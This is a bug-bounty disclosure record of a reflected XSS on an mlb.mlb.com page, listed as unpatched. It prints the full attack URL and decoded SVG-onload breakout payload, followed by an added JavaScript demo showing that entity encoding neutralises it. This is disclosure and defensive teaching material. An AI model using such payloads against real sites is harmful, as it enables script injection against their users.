mlb.mlb.com XSS vulnerability

Submitted: 2017-04-29T12:22:00
ID: OBB:229173
Type: openbugbounty
Reporter: MrJamesHemmings
Modified: 2017-05-29T07:15:00

Description

Vulnerable URL (reflected XSS through the FORM_CODE query parameter; reproduced as reported, with the bracket-pick parameters that follow the payload left intact):
http://mlb.mlb.com/mlb/news/entertainment/movie_madness/bracket_success.jsp?FORM_CODE=mlb_2008_bball_movie_madness%22--!%3E%3CSvg/Onload=confirm%28%27OPENBUGBOUNTY%27%29%3E%22&b;_c_2_1=Bull%20Durham&b;_c_2_2=Major%20League&b;_c_2_3=A%20League%20of%20Their%20Own&b;_c_2_4=Fever%20Pitch&b;_c_2_5=Bad%20New%20Bears%20%281976%29&b;_c_2_6=The%20Scout&b;_c_2_7=Mr.%20Baseball&b;_c_2_8=The%20Bingo%20Long%20Traveling%20All-Stars%20%26amp%3B%20Motor%20Kings&b;_c_3_1=Bull%20Durham&b;_c_3_2=A%20League%20of%20Their%20Own&b;_c_3_3=Bad%20New%20Bears%20%281976%29&b;_c_3_4=The%20Bingo%20Long%20Traveling%20All-Stars%20%26amp%3B%20Motor%20Kings&b;_c_4_1=A%20League%20of%20Their%20Own&b;_c_4_2=Bad%20New%20Bears%20%281976%29&b;_c_5_1=A%20League%20of%20Their%20Own&b;_d_2_1=The%20Natural&b;_d_2_2=For%20Love%20of%20the%20Game&b;_d_2_3=The%20Rookie&b;_d_2_4=61*&b;_d_2_5=Eight%20Men%20Out&b;_d_2_6=Don%27t%20Look%20Back&b;_d_2_7=Cobb&b;_d_2_8=The%20Final%20Season&b;_d_3_1=The%20Natural&b;_d_3_2=61*&b;_d_3_3=Eight%20Men%20Out&b;_d_3_4=The%20Final%20Season&b;_d_4_1=61*&b;_d_4_2=Eight%20Men%20Out&b;_d_5_1=61*&b;_l_2_1=Field%20of%20Dreams&b;_l_2_2=Chasing%20October&b;_l_2_3=Hank%20Aaron%3A%20Chasing%20the%20Dream&b;_l_2_4=Up%20For%20Grabs&b;_l_2_5=When%20it%20Was%20a%20Game&b;_l_2_6=Tiger%20Town&b;_l_2_7=Ken%20Burns%27%20Baseball&b;_l_2_8=The%20Life%20and%20Times%20of%20Hank%20Greenberg&b;_l_3_1=Field%20of%20Dreams&b;_l_3_2=Up%20For%20Grabs&b;_l_3_3=When%20it%20Was%20a%20Game&b;_l_3_4=Ken%20Burns%27%20Baseball&b;_l_4_1=Field%20of%20Dreams&b;_l_4_2=Ken%20Burns%27%20Baseball&b;_l_5_1=Field%20of%20Dreams&b;_o_2_1=Pride%20of%20the%20Yankees&b;_o_2_2=The%20Winning%20Team&b;_o_2_3=It%20Happens%20Every%20Spring&b;_o_2_4=Damn%20Yankees&b;_o_2_5=The%20Jackie%20Robinson%20Story&b;_o_2_6=The%20Stratton%20Story&b;_o_2_7=Fear%20Strikes%20Out&b;_o_2_8=The%20Kid%20From%20Left%20Field&b;_o_3_1=Pride%20of%20the%20Yankees&b;_o_3_2=It%20Happens%20Every%20Spring&b;_o_3_3=The%20Jackie%20Robinson%20Story&b;_o_3_4=Fear%20Strikes%20Out&b;_o_4_1=Pride%20of%20the%20Yankees&b;_o_4_2=The%20Jackie%20Robinson%20Story&b;_o_5_1=Pride%20of%20the%20Yankees&b;_f_1_1=A%20League%20of%20Their%20Own&b;_f_1_2=61*&b;_f_1_3=Field%20of%20Dreams&b;_f_1_4=Pride%20of%20the%20Yankees&b;_f_2_1=61*&b;_f_2_2=Field%20of%20Dreams&b;_f_3_1=Field%20of%20Dreams&submitButton;=%20Submit%20#

Decoded value carried in FORM_CODE:
mlb_2008_bball_movie_madness"--!><Svg/Onload=confirm('OPENBUGBOUNTY')>"

This is a generic context-breakout payload: the leading double quote closes an attribute value, "--!>" closes an HTML comment (the HTML parser accepts "--!>" as well as "-->" as a comment terminator), and the "<Svg/Onload=...>" tag that follows runs confirm('OPENBUGBOUNTY') as the proof of concept. The report does not record which of those contexts bracket_success.jsp actually reflected the parameter into; only that the reflection was unencoded.
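The following is an added example, not code from the Open Bug Bounty report or from mlb.com. It URL-decodes the FORM_CODE payload exactly as a servlet would receive it, renders it through a constructed stand-in for the vulnerable page, and shows that HTML entity encoding of the reflected value neutralizes the breakout. The stand-in assumes the JSP echoed FORM_CODE inside an HTML comment (inferred from the "--!>" prefix of the payload; the real template is unknown), and the bracket-pick parameters of the reported URL are omitted. All function names (extractFormCode, renderVulnerable, renderFixed, containsLiveSvg, demo) are hypothetical.

```javascript
// Added example, not code from the Open Bug Bounty report or from mlb.com.
// Decodes the FORM_CODE payload from the reported URL and shows why it
// executes when a page reflects the parameter without output encoding.
// Assumption: bracket_success.jsp echoed FORM_CODE inside an HTML comment
// (inferred from the "--!>" prefix of the payload); the actual JSP is unknown,
// and the bracket-pick parameters (b_c_2_1 and friends) are left out here.

const reportedUrl =
  "http://mlb.mlb.com/mlb/news/entertainment/movie_madness/bracket_success.jsp" +
  "?FORM_CODE=mlb_2008_bball_movie_madness%22--!%3E%3CSvg/Onload=" +
  "confirm%28%27OPENBUGBOUNTY%27%29%3E%22";

// What the servlet sees after URL-decoding the query string.
function extractFormCode(url) {
  return new URL(url).searchParams.get("FORM_CODE");
}

// Hypothetical vulnerable rendering: the raw value is concatenated into a
// comment that the page emits for debugging or tracking.
function renderVulnerable(formCode) {
  return `<!-- form code: "${formCode}" -->`;
}

// Entity-encode the five characters that matter in HTML text and
// double-quoted attribute values. A production fix would use a library
// encoder chosen for the exact output context (JSTL <c:out> or the OWASP
// Java Encoder in a JSP); this hand-rolled version is only for the demo.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderFixed(formCode) {
  return `<!-- form code: "${escapeHtml(formCode)}" -->`;
}

// Approximate the HTML5 tokenizer's comment handling: both "-->" and "--!>"
// terminate a comment. Anything left over that looks like an <svg> start tag
// would be parsed as a live element, so its onload handler would run.
function containsLiveSvg(html) {
  const withoutComments = html.replace(/<!--[\s\S]*?--!?>/g, "");
  return /<svg\b/i.test(withoutComments);
}

// Walk the reported payload end to end and return what each rendering does.
function demo() {
  const formCode = extractFormCode(reportedUrl);
  const vulnerable = renderVulnerable(formCode);
  const fixed = renderFixed(formCode);
  console.log("decoded FORM_CODE :", formCode);
  console.log("vulnerable markup :", vulnerable, "->",
    containsLiveSvg(vulnerable) ? "XSS fires" : "inert");
  console.log("encoded markup    :", fixed, "->",
    containsLiveSvg(fixed) ? "XSS fires" : "inert");
  return {
    formCode,
    vulnerableFires: containsLiveSvg(vulnerable),
    fixedFires: containsLiveSvg(fixed),
  };
}

demo();
```

Run it with node. Two caveats a practitioner would apply before relying on the encoded form: HTML entity encoding is the right fix only when the value lands in HTML text or a quoted attribute; if the JSP had reflected FORM_CODE inside a script block or an event-handler attribute, the attacker would not need any of the characters escaped here and JavaScript-string encoding for that context would be required instead. And reflecting untrusted input into a comment at all is unnecessary surface; the simplest durable fix is to stop emitting it.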
Details:

Field| Value
---|---
Patched| No
Latest check for patch| 31.07.2017
Vulnerability type| XSS
Vulnerability status| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status| No

Coordinated Disclosure Timeline:

Event| Date
---|---
Vulnerability submitted via Open Bug Bounty| 29 April, 2017 12:22 GMT
Vulnerability existence verified and confirmed| 1 May, 2017 06:31 GMT
Generic security notifications sent to website owner| 1 May, 2017 06:31 GMT
Customized security notification sent to website owner| 1 May, 2017 06:31 GMT
Notification sent to subscribers (without technical details)| 1 May, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 29 May, 2017 07:15 GMT